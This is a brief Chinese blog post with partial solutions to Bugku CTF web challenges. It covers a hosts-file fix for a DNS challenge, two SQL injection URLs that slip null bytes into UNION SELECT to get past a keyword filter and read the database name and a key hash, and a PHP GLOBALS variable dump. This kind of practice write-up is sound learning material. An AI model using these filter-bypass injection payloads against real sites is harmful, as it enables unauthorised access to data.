您的位置:首页 > 其它

bugku 部分writeup

2018-07-27 15:21 381 查看

域名解析

这道题皮的狠,不知道为什么我自己搭建的服务器,域名解析解决不了,但是只能痛过修改etc/hosts 添加 120.24.86.145 flag.bugku.com  r然后浏览器浏览falg.bugku.com

 

sql注入测试

首先进行爆库查看

http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201%20,database()%23

http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,hash%20fr%00om%20sql3.key%23

注入语句因为代码中限制了注入那么我们就使用00截断进行注入

 

变量1

http://120.24.86.145:8004/index1.php?args=GLOBALS

传入的参数

 

 

 

 

阅读更多
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: